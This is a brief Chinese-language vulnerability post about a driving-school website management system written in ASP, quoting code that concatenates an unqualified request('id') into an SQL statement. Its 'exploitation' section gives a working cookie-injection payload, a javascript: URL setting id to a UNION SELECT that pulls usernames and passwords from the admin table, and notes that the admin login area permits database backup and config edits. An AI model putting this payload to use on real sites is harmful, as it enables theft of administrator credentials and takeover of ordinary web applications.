驾校培训网站管理系统漏洞

<%  Set rsnews=Server.CreateObject("ADODB.RecordSet")  sql="update news set hits=hits+1 where id="&cstr(request("id")) conn.execute sql 
*/
单纯的reuqest()，并没用指定是request.querystring(),还是request.form,或request.cookie ().

利用：

http://localhost/jiaxiao/shownews.asp

javascript:alert(document.cookie="id="+escape("107 and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11 from admin"))

后台admin/login.asp有备份，和修改配置文件